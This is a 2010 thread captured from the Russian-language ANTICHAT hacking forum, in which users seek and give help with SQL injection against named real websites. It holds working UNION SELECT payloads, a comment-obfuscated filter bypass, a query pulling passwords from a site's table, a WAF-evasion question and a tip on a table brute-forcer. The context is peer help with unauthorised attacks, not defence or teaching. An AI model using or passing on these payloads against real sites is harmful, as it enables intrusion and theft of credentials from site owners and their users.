HOME    FORUMS    MEMBERS    RECENT POSTS    LOG IN  
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #14371  
Старый 14.07.2010, 01:32
Anexroid
Новичок
Регистрация: 22.08.2009
Сообщений: 7
Провел на форуме:
23465

Репутация: 1
По умолчанию

Может кто нибудь на примере объяснить?

У формы action="?page=reg"

2 поля

допустим

login

pass

В логин я пишу 123

В пасс - 1 UNION ..........

Вывод есть у 4,5 и 6-го поля.

Как правильно вбить параметры в программу?

и где proxy вписывать, а то не нашел?

+ допустим точно знаю, что есть таблицы users и news
 
Ответить с цитированием

  #14372  
Старый 14.07.2010, 10:21
linuxkernal
Новичок
Регистрация: 12.03.2010
Сообщений: 7
Провел на форуме:
38329

Репутация: 0
По умолчанию

website is vulnerable

sql injection error is : Query failed: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '\'a' at line 1

i use command order by and i got 23 columns but when i paste link in browser like this

UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20 ,21,22,23--

page load normally and i can not see printable field

can help me what i am doing mistake
 
Ответить с цитированием

  #14373  
Старый 14.07.2010, 10:30
winstrool
Познающий
Регистрация: 06.03.2007
Сообщений: 59
Провел на форуме:
371875

Репутация: 137
По умолчанию

*.php?id=1 UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20 ,21,22,23--

try to put(deliver) -

*.php?id=-1 UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20 ,21,22,23--
 
Ответить с цитированием

  #14374  
Старый 14.07.2010, 10:33
Konqi
Постоянный
Регистрация: 24.06.2009
Сообщений: 542
Провел на форуме:
2101094

Репутация: 672


Отправить сообщение для Konqi с помощью ICQ
По умолчанию

Цитата:
Сообщение от linuxkernal  
linuxkernal said:
website is vulnerable
sql injection error is : Query failed: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '\'a' at line 1
i use command order by and i got 23 columns but when i paste link in browser like this
UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20 ,21,22,23--
page load normally and i can not see printable field
can help me what i am doing mistake
linuxkernel это русскоязычный форум и здесь очень мало народа понимает что вы писали, следующий раз используйте онлайн транслиты или ваш пост будет удален.

-------

linuxkernel this is a russian board forum,and most of guys can't understand what u posted here,next time use online translators or your post will be deleted
 
Ответить с цитированием

  #14375  
Старый 14.07.2010, 12:37
winstrool
Познающий
Регистрация: 06.03.2007
Сообщений: 59
Провел на форуме:
371875

Репутация: 137
По умолчанию

Подскажите какой лудше использовать брутер sql таблиц, полазил по форуму но ничего интиресного не нашел, из того что есть все както разплывчито обьесняется...
 
Ответить с цитированием

  #14376  
Старый 14.07.2010, 12:45
Konqi
Постоянный
Регистрация: 24.06.2009
Сообщений: 542
Провел на форуме:
2101094

Репутация: 672


Отправить сообщение для Konqi с помощью ICQ
По умолчанию

вы издеваетесь что ли? я же написал выше, не писать на английском!!!!

linuxkernel и все кто хочет задавать такие вопросы ` hackforums.net, вам туда

Цитата:
Сообщение от winstrool  
winstrool said:
Подскажите какой лудше использовать брутер sql таблиц, полазил по форуму но ничего интиресного не нашел, из того что есть все както разплывчито обьесняется...
для этих целей используют SIPT
 
Ответить с цитированием

  #14377  
Старый 14.07.2010, 14:55
boberko
Новичок
Регистрация: 24.01.2009
Сообщений: 10
Провел на форуме:
72528

Репутация: 1
По умолчанию

Прошу помощи:

Нашел вроде скуль:

_http://dovidka.if.ua/rubric.php?id=86'

Но не могу подобрать колонки? в чем проблема?
 
Ответить с цитированием

  #14378  
Старый 14.07.2010, 15:02
Konqi
Постоянный
Регистрация: 24.06.2009
Сообщений: 542
Провел на форуме:
2101094

Репутация: 672


Отправить сообщение для Konqi с помощью ICQ
По умолчанию

Цитата:
Сообщение от boberko  
boberko said:
Прошу помощи:
Нашел вроде скуль:
_http://dovidka.if.ua/rubric.php?id=86'
Но не могу подобрать колонки? в чем проблема?
http://dovidka.if.ua/rubric.php?id=-86+/*!UnIoN+SeLeCt*/+1,version(),3,4,5,6,7
 
Ответить с цитированием

  #14379  
Старый 14.07.2010, 15:15
Seravin
Участник форума
Регистрация: 25.11.2009
Сообщений: 201
Провел на форуме:
866555

Репутация: 226
По умолчанию

Код:
Code:
http://www.angusanddundee.co.uk/festive/events/event_detail.cfm?ID=1577+and+1=2+union+select+1,2,3,password,5,6,7,8,9,10,11,12,13,14,15,16+from+pass
помогите подобрать логин плз
 
Ответить с цитированием

  #14380  
Старый 14.07.2010, 17:36
haito
Новичок
Регистрация: 27.05.2010
Сообщений: 13
Провел на форуме:
20441

Репутация: 0
По умолчанию

Код:
Code:
http://www.crossfitnb.com/archive.php?month=2009-03%20and%201=1
Ошибка 403.

А вот так:

Код:
Code:
http://www.crossfitnb.com/archive.php?month=2009-03 select union 1--+
Работает.

Как обойти?
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Ваши ламерские приколы (Ну когда только комп появился) PEPSICOLA Болталка 188 23.05.2010 10:05
Ваши любимые компьютерные игры PEPSICOLA Болталка 280 19.08.2009 00:01
Ваши телеги... F-IFTY Болталка 13 18.08.2009 18:22
Вопросы по Ipb 2.0 Voodoo_People Уязвимости CMS / форумов 26 15.02.2005 22:57



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ